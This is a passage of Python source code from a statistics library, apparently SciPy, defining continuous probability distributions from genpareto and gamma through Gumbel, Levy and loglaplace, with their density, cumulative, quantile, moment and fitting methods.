g1 /= np.power(mu2, 1.5)
g2 = pi**4/15.0 + 6*zeta(4, c)
g2 /= mu2**2.0
return mu, mu2, g1, g2
genlogistic = genlogistic_gen(name='genlogistic')
class genpareto_gen(rv_continuous):
"""A generalized Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genpareto` is::
genpareto.pdf(x, c) = (1 + c * x)**(-1 - 1/c)
defined for ``x >= 0`` if ``c >=0``, and for
``0 <= x <= -1/c`` if ``c < 0``.
For ``c == 0``, `genpareto` reduces to the exponential
distribution, `expon`::
genpareto.pdf(x, c=0) = exp(-x)
For ``c == -1``, `genpareto` is uniform on ``[0, 1]``::
genpareto.cdf(x, c=-1) = x
%(example)s
"""
def _argcheck(self, c):
c = asarray(c)
self.b = _lazywhere(c < 0, (c,),
lambda c: -1. / c, np.inf)
return True
def _pdf(self, x, c):
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -special.xlog1py(c+1., c*x) / c,
-x)
def _cdf(self, x, c):
return -inv_boxcox1p(-x, -c)
def _sf(self, x, c):
return inv_boxcox(-x, -c)
def _ppf(self, q, c):
return -boxcox1p(-q, -c)
def _isf(self, q, c):
return -boxcox(q, -c)
def _munp(self, n, c):
def __munp(n, c):
val = 0.0
k = arange(0, n + 1)
for ki, cnk in zip(k, comb(n, k)):
val = val + cnk * (-1) ** ki / (1.0 - c * ki)
return where(c * n < 1, val * (-1.0 / c) ** n, inf)
return _lazywhere(c != 0, (c,),
lambda c: __munp(n, c),
gam(n + 1))
def _entropy(self, c):
return 1. + c
genpareto = genpareto_gen(a=0.0, name='genpareto')
class genexpon_gen(rv_continuous):
"""A generalized exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genexpon` is::
genexpon.pdf(x, a, b, c) = (a + b * (1 - exp(-c*x))) * \
exp(-a*x - b*x + b/c * (1-exp(-c*x)))
for ``x >= 0``, ``a, b, c > 0``.
References
----------
H.K. Ryu, "An Extension of Marshall and Olkin's Bivariate Exponential
Distribution", Journal of the American Statistical Association, 1993.
N. Balakrishnan, "The Exponential Distribution: Theory, Methods and
Applications", Asit P. Basu.
%(example)s
"""
def _pdf(self, x, a, b, c):
return (a + b*(-special.expm1(-c*x)))*exp((-a-b)*x +
b*(-special.expm1(-c*x))/c)
def _cdf(self, x, a, b, c):
return -special.expm1((-a-b)*x + b*(-special.expm1(-c*x))/c)
def _logpdf(self, x, a, b, c):
return np.log(a+b*(-special.expm1(-c*x))) + \
(-a-b)*x+b*(-special.expm1(-c*x))/c
genexpon = genexpon_gen(a=0.0, name='genexpon')
class genextreme_gen(rv_continuous):
"""A generalized extreme value continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r
Notes
-----
For ``c=0``, `genextreme` is equal to `gumbel_r`.
The probability density function for `genextreme` is::
genextreme.pdf(x, c) =
exp(-exp(-x))*exp(-x), for c==0
exp(-(1-c*x)**(1/c))*(1-c*x)**(1/c-1), for x <= 1/c, c > 0
Note that several sources and software packages use the opposite
convention for the sign of the shape parameter ``c``.
%(example)s
"""
def _argcheck(self, c):
min = np.minimum
max = np.maximum
self.b = where(c > 0, 1.0 / max(c, _XMIN), inf)
self.a = where(c < 0, 1.0 / min(c, -_XMIN), -inf)
return where(abs(c) == inf, 0, 1)
def _pdf(self, x, c):
cx = c*x
logex2 = where((c == 0)*(x == x), 0.0, special.log1p(-cx))
logpex2 = where((c == 0)*(x == x), -x, logex2/c)
pex2 = exp(logpex2)
# Handle special cases
logpdf = where((cx == 1) | (cx == -inf), -inf, -pex2+logpex2-logex2)
putmask(logpdf, (c == 1) & (x == 1), 0.0)
return exp(logpdf)
def _cdf(self, x, c):
loglogcdf = where((c == 0)*(x == x), -x, special.log1p(-c*x)/c)
return exp(-exp(loglogcdf))
def _ppf(self, q, c):
x = -log(-log(q))
return where((c == 0)*(x == x), x, -special.expm1(-c*x)/c)
def _stats(self, c):
g = lambda n: gam(n*c+1)
g1 = g(1)
g2 = g(2)
g3 = g(3)
g4 = g(4)
g2mg12 = where(abs(c) < 1e-7, (c*pi)**2.0/6.0, g2-g1**2.0)
gam2k = where(abs(c) < 1e-7, pi**2.0/6.0,
special.expm1(gamln(2.0*c+1.0)-2*gamln(c+1.0))/c**2.0)
eps = 1e-14
gamk = where(abs(c) < eps, -_EULER, special.expm1(gamln(c+1))/c)
m = where(c < -1.0, nan, -gamk)
v = where(c < -0.5, nan, g1**2.0*gam2k)
# skewness
sk1 = where(c < -1./3, nan,
np.sign(c)*(-g3+(g2+2*g2mg12)*g1)/((g2mg12)**(3./2.)))
sk = where(abs(c) <= eps**0.29, 12*sqrt(6)*_ZETA3/pi**3, sk1)
# kurtosis
ku1 = where(c < -1./4, nan,
(g4+(-4*g3+3*(g2+g2mg12)*g1)*g1)/((g2mg12)**2))
ku = where(abs(c) <= (eps)**0.23, 12.0/5.0, ku1-3.0)
return m, v, sk, ku
def _munp(self, n, c):
k = arange(0, n+1)
vals = 1.0/c**n * sum(
comb(n, k) * (-1)**k * special.gamma(c*k + 1),
axis=0)
return where(c*n > -1, vals, inf)
genextreme = genextreme_gen(name='genextreme')
def _digammainv(y):
# Inverse of the digamma function (real positive arguments only).
# This function is used in the `fit` method of `gamma_gen`.
# The function uses either optimize.fsolve or optimize.newton
# to solve `digamma(x) - y = 0`. There is probably room for
# improvement, but currently it works over a wide range of y:
# >>> y = 64*np.random.randn(1000000)
# >>> y.min(), y.max()
# (-311.43592651416662, 351.77388222276869)
# x = [_digammainv(t) for t in y]
# np.abs(digamma(x) - y).max()
# 1.1368683772161603e-13
#
_em = 0.5772156649015328606065120
func = lambda x: special.digamma(x) - y
if y > -0.125:
x0 = exp(y) + 0.5
if y < 10:
# Some experimentation shows that newton reliably converges
# must faster than fsolve in this y range. For larger y,
# newton sometimes fails to converge.
value = optimize.newton(func, x0, tol=1e-10)
return value
elif y > -3:
x0 = exp(y/2.332) + 0.08661
else:
x0 = 1.0 / (-y - _em)
value, info, ier, mesg = optimize.fsolve(func, x0, xtol=1e-11,
full_output=True)
if ier != 1:
raise RuntimeError("_digammainv: fsolve failed, y = %r" % y)
return value[0]
## Gamma (Use MATLAB and MATHEMATICA (b=theta=scale, a=alpha=shape) definition)
## gamma(a, loc, scale) with a an integer is the Erlang distribution
## gamma(1, loc, scale) is the Exponential distribution
## gamma(df/2, 0, 2) is the chi2 distribution with df degrees of freedom.
class gamma_gen(rv_continuous):
"""A gamma continuous random variable.
%(before_notes)s
See Also
--------
erlang, expon
Notes
-----
The probability density function for `gamma` is::
gamma.pdf(x, a) = lambda**a * x**(a-1) * exp(-lambda*x) / gamma(a)
for ``x >= 0``, ``a > 0``. Here ``gamma(a)`` refers to the gamma function.
The scale parameter is equal to ``scale = 1.0 / lambda``.
`gamma` has a shape parameter `a` which needs to be set explicitly. For
instance:
>>> from scipy.stats import gamma
>>> rv = gamma(3., loc = 0., scale = 2.)
produces a frozen form of `gamma` with shape ``a = 3.``, ``loc =0.``
and ``lambda = 1./scale = 1./2.``.
When ``a`` is an integer, `gamma` reduces to the Erlang
distribution, and when ``a=1`` to the exponential distribution.
%(example)s
"""
def _rvs(self, a):
return self._random_state.standard_gamma(a, self._size)
def _pdf(self, x, a):
return exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return special.xlogy(a-1.0, x) - x - gamln(a)
def _cdf(self, x, a):
return special.gammainc(a, x)
def _sf(self, x, a):
return special.gammaincc(a, x)
def _ppf(self, q, a):
return special.gammaincinv(a, q)
def _stats(self, a):
return a, a, 2.0/sqrt(a), 6.0/a
def _entropy(self, a):
return special.psi(a)*(1-a) + a + gamln(a)
def _fitstart(self, data):
# The skewness of the gamma distribution is `4 / sqrt(a)`.
# We invert that to estimate the shape `a` using the skewness
# of the data. The formula is regularized with 1e-8 in the
# denominator to allow for degenerate data where the skewness
# is close to 0.
a = 4 / (1e-8 + _skew(data)**2)
return super(gamma_gen, self)._fitstart(data, args=(a,))
@inherit_docstring_from(rv_continuous)
def fit(self, data, *args, **kwds):
f0 = kwds.get('f0', None)
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(gamma_gen, self).fit(data, *args, **kwds)
# Special case: loc is fixed.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Fixed location is handled by shifting the data.
data = np.asarray(data)
if np.any(data <= floc):
raise FitDataError("gamma", lower=floc, upper=np.inf)
if floc != 0:
# Don't do the subtraction in-place, because `data` might be a
# view of the input array.
data = data - floc
xbar = data.mean()
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free
if f0 is not None:
# shape is fixed
a = f0
else:
# shape and scale are both free.
# The MLE for the shape parameter `a` is the solution to:
# log(a) - special.digamma(a) - log(xbar) + log(data.mean) = 0
s = log(xbar) - log(data).mean()
func = lambda a: log(a) - special.digamma(a) - s
aest = (3-s + np.sqrt((s-3)**2 + 24*s)) / (12*s)
xa = aest*(1-0.4)
xb = aest*(1+0.4)
a = optimize.brentq(func, xa, xb, disp=0)
# The MLE for the scale parameter is just the data mean
# divided by the shape parameter.
scale = xbar / a
else:
# scale is fixed, shape is free
# The MLE for the shape parameter `a` is the solution to:
# special.digamma(a) - log(data).mean() + log(fscale) = 0
c = log(data).mean() - log(fscale)
a = _digammainv(c)
scale = fscale
return a, floc, scale
gamma = gamma_gen(a=0.0, name='gamma')
class erlang_gen(gamma_gen):
"""An Erlang continuous random variable.
%(before_notes)s
See Also
--------
gamma
Notes
-----
The Erlang distribution is a special case of the Gamma distribution, with
the shape parameter `a` an integer. Note that this restriction is not
enforced by `erlang`. It will, however, generate a warning the first time
a non-integer value is used for the shape parameter.
Refer to `gamma` for examples.
"""
def _argcheck(self, a):
allint = np.all(np.floor(a) == a)
allpos = np.all(a > 0)
if not allint:
# An Erlang distribution shouldn't really have a non-integer
# shape parameter, so warn the user.
warnings.warn(
'The shape parameter of the erlang distribution '
'has been given a non-integer value %r.' % (a,),
RuntimeWarning)
return allpos
def _fitstart(self, data):
# Override gamma_gen_fitstart so that an integer initial value is
# used. (Also regularize the division, to avoid issues when
# _skew(data) is 0 or close to 0.)
a = int(4.0 / (1e-8 + _skew(data)**2))
return super(gamma_gen, self)._fitstart(data, args=(a,))
# Trivial override of the fit method, so we can monkey-patch its
# docstring.
def fit(self, data, *args, **kwds):
return super(erlang_gen, self).fit(data, *args, **kwds)
if fit.__doc__ is not None:
fit.__doc__ = (rv_continuous.fit.__doc__ +
"""
Notes
-----
The Erlang distribution is generally defined to have integer values
for the shape parameter. This is not enforced by the `erlang` class.
When fitting the distribution, it will generally return a non-integer
value for the shape parameter. By using the keyword argument
`f0=<integer>`, the fit method can be constrained to fit the data to
a specific integer shape parameter.
""")
erlang = erlang_gen(a=0.0, name='erlang')
class gengamma_gen(rv_continuous):
"""A generalized gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gengamma` is::
gengamma.pdf(x, a, c) = abs(c) * x**(c*a-1) * exp(-x**c) / gamma(a)
for ``x > 0``, ``a > 0``, and ``c != 0``.
%(example)s
"""
def _argcheck(self, a, c):
return (a > 0) & (c != 0)
def _pdf(self, x, a, c):
return exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
return log(abs(c)) + special.xlogy(c*a - 1, x) - x**c - gamln(a)
def _cdf(self, x, a, c):
val = special.gammainc(a, x**c)
cond = c + 0*val
return where(cond > 0, val, 1-val)
def _ppf(self, q, a, c):
val1 = special.gammaincinv(a, q)
val2 = special.gammaincinv(a, 1.0-q)
ic = 1.0/c
cond = c+0*val1
return where(cond > 0, val1**ic, val2**ic)
def _munp(self, n, a, c):
return special.gamma(a+n*1.0/c) / special.gamma(a)
def _entropy(self, a, c):
val = special.psi(a)
return a*(1-val) + 1.0/c*val + gamln(a)-log(abs(c))
gengamma = gengamma_gen(a=0.0, name='gengamma')
class genhalflogistic_gen(rv_continuous):
"""A generalized half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genhalflogistic` is::
genhalflogistic.pdf(x, c) = 2 * (1-c*x)**(1/c-1) / (1+(1-c*x)**(1/c))**2
for ``0 <= x <= 1/c``, and ``c > 0``.
%(example)s
"""
def _argcheck(self, c):
self.b = 1.0 / c
return (c > 0)
def _pdf(self, x, c):
limit = 1.0/c
tmp = asarray(1-c*x)
tmp0 = tmp**(limit-1)
tmp2 = tmp0*tmp
return 2*tmp0 / (1+tmp2)**2
def _cdf(self, x, c):
limit = 1.0/c
tmp = asarray(1-c*x)
tmp2 = tmp**(limit)
return (1.0-tmp2) / (1+tmp2)
def _ppf(self, q, c):
return 1.0/c*(1-((1.0-q)/(1.0+q))**c)
def _entropy(self, c):
return 2 - (2*c+1)*log(2)
genhalflogistic = genhalflogistic_gen(a=0.0, name='genhalflogistic')
class gompertz_gen(rv_continuous):
"""A Gompertz (or truncated Gumbel) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gompertz` is::
gompertz.pdf(x, c) = c * exp(x) * exp(-c*(exp(x)-1))
for ``x >= 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return log(c) + x - c * (exp(x) - 1.)
def _cdf(self, x, c):
return 1.0-exp(-c*(exp(x)-1))
def _ppf(self, q, c):
return log(1-1.0/c*log(1-q))
def _entropy(self, c):
return 1.0 - log(c) - exp(c)*special.expn(1, c)
gompertz = gompertz_gen(a=0.0, name='gompertz')
class gumbel_r_gen(rv_continuous):
"""A right-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_l, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_r` is::
gumbel_r.pdf(x) = exp(-(x + exp(-x)))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return -x - exp(-x)
def _cdf(self, x):
return exp(-exp(-x))
def _logcdf(self, x):
return -exp(-x)
def _ppf(self, q):
return -log(-log(q))
def _stats(self):
return _EULER, pi*pi/6.0, 12*sqrt(6)/pi**3 * _ZETA3, 12.0/5
def _entropy(self):
# http://en.wikipedia.org/wiki/Gumbel_distribution
return _EULER + 1.
gumbel_r = gumbel_r_gen(name='gumbel_r')
class gumbel_l_gen(rv_continuous):
"""A left-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_l` is::
gumbel_l.pdf(x) = exp(x - exp(x))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return x - exp(x)
def _cdf(self, x):
return 1.0-exp(-exp(x))
def _ppf(self, q):
return log(-log(1-q))
def _stats(self):
return -_EULER, pi*pi/6.0, \
-12*sqrt(6)/pi**3 * _ZETA3, 12.0/5
def _entropy(self):
return _EULER + 1.
gumbel_l = gumbel_l_gen(name='gumbel_l')
class halfcauchy_gen(rv_continuous):
"""A Half-Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfcauchy` is::
halfcauchy.pdf(x) = 2 / (pi * (1 + x**2))
for ``x >= 0``.
%(example)s
"""
def _pdf(self, x):
return 2.0/pi/(1.0+x*x)
def _logpdf(self, x):
return np.log(2.0/pi) - special.log1p(x*x)
def _cdf(self, x):
return 2.0/pi*arctan(x)
def _ppf(self, q):
return tan(pi/2*q)
def _stats(self):
return inf, inf, nan, nan
def _entropy(self):
return log(2*pi)
halfcauchy = halfcauchy_gen(a=0.0, name='halfcauchy')
class halflogistic_gen(rv_continuous):
"""A half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halflogistic` is::
halflogistic.pdf(x) = 2 * exp(-x) / (1+exp(-x))**2 = 1/2 * sech(x/2)**2
for ``x >= 0``.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return log(2) - x - 2. * special.log1p(exp(-x))
def _cdf(self, x):
return tanh(x/2.0)
def _ppf(self, q):
return 2*arctanh(q)
def _munp(self, n):
if n == 1:
return 2*log(2)
if n == 2:
return pi*pi/3.0
if n == 3:
return 9*_ZETA3
if n == 4:
return 7*pi**4 / 15.0
return 2*(1-pow(2.0, 1-n))*special.gamma(n+1)*special.zeta(n, 1)
def _entropy(self):
return 2-log(2)
halflogistic = halflogistic_gen(a=0.0, name='halflogistic')
class halfnorm_gen(rv_continuous):
"""A half-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfnorm` is::
halfnorm.pdf(x) = sqrt(2/pi) * exp(-x**2/2)
for ``x > 0``.
`halfnorm` is a special case of `chi` with ``df == 1``.
%(example)s
"""
def _rvs(self):
return abs(self._random_state.standard_normal(size=self._size))
def _pdf(self, x):
return sqrt(2.0/pi)*exp(-x*x/2.0)
def _logpdf(self, x):
return 0.5 * np.log(2.0/pi) - x*x/2.0
def _cdf(self, x):
return special.ndtr(x)*2-1.0
def _ppf(self, q):
return special.ndtri((1+q)/2.0)
def _stats(self):
return (sqrt(2.0/pi), 1-2.0/pi, sqrt(2)*(4-pi)/(pi-2)**1.5,
8*(pi-3)/(pi-2)**2)
def _entropy(self):
return 0.5*log(pi/2.0)+0.5
halfnorm = halfnorm_gen(a=0.0, name='halfnorm')
class hypsecant_gen(rv_continuous):
"""A hyperbolic secant continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `hypsecant` is::
hypsecant.pdf(x) = 1/pi * sech(x)
%(example)s
"""
def _pdf(self, x):
return 1.0/(pi*cosh(x))
def _cdf(self, x):
return 2.0/pi*arctan(exp(x))
def _ppf(self, q):
return log(tan(pi*q/2.0))
def _stats(self):
return 0, pi*pi/4, 0, 2
def _entropy(self):
return log(2*pi)
hypsecant = hypsecant_gen(name='hypsecant')
class gausshyper_gen(rv_continuous):
"""A Gauss hypergeometric continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gausshyper` is::
gausshyper.pdf(x, a, b, c, z) =
C * x**(a-1) * (1-x)**(b-1) * (1+z*x)**(-c)
for ``0 <= x <= 1``, ``a > 0``, ``b > 0``, and
``C = 1 / (B(a, b) F[2, 1](c, a; a+b; -z))``
%(example)s
"""
def _argcheck(self, a, b, c, z):
return (a > 0) & (b > 0) & (c == c) & (z == z)
def _pdf(self, x, a, b, c, z):
Cinv = gam(a)*gam(b)/gam(a+b)*special.hyp2f1(c, a, a+b, -z)
return 1.0/Cinv * x**(a-1.0) * (1.0-x)**(b-1.0) / (1.0+z*x)**c
def _munp(self, n, a, b, c, z):
fac = special.beta(n+a, b) / special.beta(a, b)
num = special.hyp2f1(c, a+n, a+b+n, -z)
den = special.hyp2f1(c, a, a+b, -z)
return fac*num / den
gausshyper = gausshyper_gen(a=0.0, b=1.0, name='gausshyper')
class invgamma_gen(rv_continuous):
"""An inverted gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgamma` is::
invgamma.pdf(x, a) = x**(-a-1) / gamma(a) * exp(-1/x)
for x > 0, a > 0.
`invgamma` is a special case of `gengamma` with ``c == -1``.
%(example)s
"""
def _pdf(self, x, a):
return exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return (-(a+1) * log(x) - gamln(a) - 1.0/x)
def _cdf(self, x, a):
return 1.0 - special.gammainc(a, 1.0/x)
def _ppf(self, q, a):
return 1.0 / special.gammaincinv(a, 1.-q)
def _stats(self, a, moments='mvsk'):
m1 = _lazywhere(a > 1, (a,), lambda x: 1. / (x - 1.), np.inf)
m2 = _lazywhere(a > 2, (a,), lambda x: 1. / (x - 1.)**2 / (x - 2.),
np.inf)
g1, g2 = None, None
if 's' in moments:
g1 = _lazywhere(
a > 3, (a,),
lambda x: 4. * np.sqrt(x - 2.) / (x - 3.), np.nan)
if 'k' in moments:
g2 = _lazywhere(
a > 4, (a,),
lambda x: 6. * (5. * x - 11.) / (x - 3.) / (x - 4.), np.nan)
return m1, m2, g1, g2
def _entropy(self, a):
return a - (a+1.0) * special.psi(a) + gamln(a)
invgamma = invgamma_gen(a=0.0, name='invgamma')
# scale is gamma from DATAPLOT and B from Regress
class invgauss_gen(rv_continuous):
"""An inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgauss` is::
invgauss.pdf(x, mu) = 1 / sqrt(2*pi*x**3) * exp(-(x-mu)**2/(2*x*mu**2))
for ``x > 0``.
When `mu` is too small, evaluating the cumulative density function will be
inaccurate due to ``cdf(mu -> 0) = inf * 0``.
NaNs are returned for ``mu <= 0.0028``.
%(example)s
"""
def _rvs(self, mu):
return self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
return 1.0/sqrt(2*pi*x**3.0)*exp(-1.0/(2*x)*((x-mu)/mu)**2)
def _logpdf(self, x, mu):
return -0.5*log(2*pi) - 1.5*log(x) - ((x-mu)/mu)**2/(2*x)
def _cdf(self, x, mu):
fac = sqrt(1.0/x)
# Numerical accuracy for small `mu` is bad. See #869.
C1 = _norm_cdf(fac*(x-mu)/mu)
C1 += exp(1.0/mu) * _norm_cdf(-fac*(x+mu)/mu) * exp(1.0/mu)
return C1
def _stats(self, mu):
return mu, mu**3.0, 3*sqrt(mu), 15*mu
invgauss = invgauss_gen(a=0.0, name='invgauss')
class invweibull_gen(rv_continuous):
"""An inverted Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invweibull` is::
invweibull.pdf(x, c) = c * x**(-c-1) * exp(-x**(-c))
for ``x > 0``, ``c > 0``.
References
----------
F.R.S. de Gusmao, E.M.M Ortega and G.M. Cordeiro, "The generalized inverse
Weibull distribution", Stat. Papers, vol. 52, pp. 591-619, 2011.
%(example)s
"""
def _pdf(self, x, c):
xc1 = np.power(x, -c - 1.0)
xc2 = np.power(x, -c)
xc2 = exp(-xc2)
return c * xc1 * xc2
def _cdf(self, x, c):
xc1 = np.power(x, -c)
return exp(-xc1)
def _ppf(self, q, c):
return np.power(-log(q), -1.0/c)
def _munp(self, n, c):
return special.gamma(1 - n / c)
def _entropy(self, c):
return 1+_EULER + _EULER / c - log(c)
invweibull = invweibull_gen(a=0, name='invweibull')
class johnsonsb_gen(rv_continuous):
"""A Johnson SB continuous random variable.
%(before_notes)s
See Also
--------
johnsonsu
Notes
-----
The probability density function for `johnsonsb` is::
johnsonsb.pdf(x, a, b) = b / (x*(1-x)) * phi(a + b * log(x/(1-x)))
for ``0 < x < 1`` and ``a, b > 0``, and ``phi`` is the normal pdf.
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
trm = _norm_pdf(a + b*log(x/(1.0-x)))
return b*1.0/(x*(1-x))*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b*log(x/(1.0-x)))
def _ppf(self, q, a, b):
return 1.0 / (1 + exp(-1.0 / b * (_norm_ppf(q) - a)))
johnsonsb = johnsonsb_gen(a=0.0, b=1.0, name='johnsonsb')
class johnsonsu_gen(rv_continuous):
"""A Johnson SU continuous random variable.
%(before_notes)s
See Also
--------
johnsonsb
Notes
-----
The probability density function for `johnsonsu` is::
johnsonsu.pdf(x, a, b) = b / sqrt(x**2 + 1) *
phi(a + b * log(x + sqrt(x**2 + 1)))
for all ``x, a, b > 0``, and `phi` is the normal pdf.
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
x2 = x*x
trm = _norm_pdf(a + b * log(x + sqrt(x2+1)))
return b*1.0/sqrt(x2+1.0)*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b * log(x + sqrt(x*x + 1)))
def _ppf(self, q, a, b):
return sinh((_norm_ppf(q) - a) / b)
johnsonsu = johnsonsu_gen(name='johnsonsu')
class laplace_gen(rv_continuous):
"""A Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `laplace` is::
laplace.pdf(x) = 1/2 * exp(-abs(x))
%(example)s
"""
def _rvs(self):
return self._random_state.laplace(0, 1, size=self._size)
def _pdf(self, x):
return 0.5*exp(-abs(x))
def _cdf(self, x):
return where(x > 0, 1.0-0.5*exp(-x), 0.5*exp(x))
def _ppf(self, q):
return where(q > 0.5, -log(2*(1-q)), log(2*q))
def _stats(self):
return 0, 2, 0, 3
def _entropy(self):
return log(2)+1
laplace = laplace_gen(name='laplace')
class levy_gen(rv_continuous):
"""A Levy continuous random variable.
%(before_notes)s
See Also
--------
levy_stable, levy_l
Notes
-----
The probability density function for `levy` is::
levy.pdf(x) = 1 / (x * sqrt(2*pi*x)) * exp(-1/(2*x))
for ``x > 0``.
This is the same as the Levy-stable distribution with a=1/2 and b=1.
%(example)s
"""
def _pdf(self, x):
return 1 / sqrt(2*pi*x) / x * exp(-1/(2*x))
def _cdf(self, x):
# Equivalent to 2*norm.sf(sqrt(1/x))
return special.erfc(sqrt(0.5 / x))
def _ppf(self, q):
# Equivalent to 1.0/(norm.isf(q/2)**2) or 0.5/(erfcinv(q)**2)
val = -special.ndtri(q/2)
return 1.0 / (val * val)
def _stats(self):
return inf, inf, nan, nan
levy = levy_gen(a=0.0, name="levy")
class levy_l_gen(rv_continuous):
"""A left-skewed Levy continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_stable
Notes
-----
The probability density function for `levy_l` is::
levy_l.pdf(x) = 1 / (abs(x) * sqrt(2*pi*abs(x))) * exp(-1/(2*abs(x)))
for ``x < 0``.
This is the same as the Levy-stable distribution with a=1/2 and b=-1.
%(example)s
"""
def _pdf(self, x):
ax = abs(x)
return 1/sqrt(2*pi*ax)/ax*exp(-1/(2*ax))
def _cdf(self, x):
ax = abs(x)
return 2 * _norm_cdf(1 / sqrt(ax)) - 1
def _ppf(self, q):
val = _norm_ppf((q + 1.0) / 2)
return -1.0 / (val * val)
def _stats(self):
return inf, inf, nan, nan
levy_l = levy_l_gen(b=0.0, name="levy_l")
class levy_stable_gen(rv_continuous):
"""A Levy-stable continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_l
Notes
-----
Levy-stable distribution (only random variates available -- ignore other
docs)
%(example)s
"""
def _rvs(self, alpha, beta):
sz = self._size
TH = uniform.rvs(loc=-pi/2.0, scale=pi, size=sz)
W = expon.rvs(size=sz)
if alpha == 1:
return 2/pi*(pi/2+beta*TH)*tan(TH)-beta*log((pi/2*W*cos(TH))/(pi/2+beta*TH))
ialpha = 1.0/alpha
aTH = alpha*TH
if beta == 0:
return W/(cos(TH)/tan(aTH)+sin(TH))*((cos(aTH)+sin(aTH)*tan(TH))/W)**ialpha
val0 = beta*tan(pi*alpha/2)
th0 = arctan(val0)/alpha
val3 = W/(cos(TH)/tan(alpha*(th0+TH))+sin(TH))
res3 = val3*((cos(aTH)+sin(aTH)*tan(TH)-val0*(sin(aTH)-cos(aTH)*tan(TH)))/W)**ialpha
return res3
def _argcheck(self, alpha, beta):
if beta == -1:
self.b = 0.0
elif beta == 1:
self.a = 0.0
return (alpha > 0) & (alpha <= 2) & (beta <= 1) & (beta >= -1)
def _pdf(self, x, alpha, beta):
raise NotImplementedError
levy_stable = levy_stable_gen(name='levy_stable')
class logistic_gen(rv_continuous):
"""A logistic (or Sech-squared) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `logistic` is::
logistic.pdf(x) = exp(-x) / (1+exp(-x))**2
`logistic` is a special case of `genlogistic` with ``c == 1``.
%(example)s
"""
def _rvs(self):
return self._random_state.logistic(size=self._size)
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return -x - 2. * special.log1p(exp(-x))
def _cdf(self, x):
return special.expit(x)
def _ppf(self, q):
return -log(1.0/q-1)
def _stats(self):
return 0, pi*pi/3.0, 0, 6.0/5.0
def _entropy(self):
# http://en.wikipedia.org/wiki/Logistic_distribution
return 2.0
logistic = logistic_gen(name='logistic')
class loggamma_gen(rv_continuous):
"""A log gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loggamma` is::
loggamma.pdf(x, c) = exp(c*x-exp(x)) / gamma(c)
for all ``x, c > 0``.
%(example)s
"""
def _rvs(self, c):
return log(self._random_state.gamma(c, size=self._size))
def _pdf(self, x, c):
return exp(c*x-exp(x)-gamln(c))
def _cdf(self, x, c):
return special.gammainc(c, exp(x))
def _ppf(self, q, c):
return log(special.gammaincinv(c, q))
def _stats(self, c):
# See, for example, "A Statistical Study of Log-Gamma Distribution", by
# Ping Shing Chan (thesis, McMaster University, 1993).
mean = special.digamma(c)
var = special.polygamma(1, c)
skewness = special.polygamma(2, c) / np.power(var, 1.5)
excess_kurtosis = special.polygamma(3, c) / (var*var)
return mean, var, skewness, excess_kurtosis
loggamma = loggamma_gen(name='loggamma')
class loglaplace_gen(rv_continuous):
"""A log-Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loglaplace` is::
loglaplace.pdf(x, c) = c / 2 * x**(c-1), for 0 < x < 1
= c / 2 * x**(-c-1), for x >= 1
for ``c > 0``.
References
----------
T.J. Kozubowski and K. Podgorski, "A log-Laplace growth rate model",
The Mathematical Scientist, vol. 28, pp. 49-60, 2003.
%(example)s
"""
def _pdf(self, x, c):
cd2 = c/2.0
c = where(x < 1, c, -c)
return cd2*x**(c-1)
def _cdf(self, x, c):
return where(x < 1, 0.5*x**c, 1-0.5*x**(-c))
def _ppf(self, q, c):
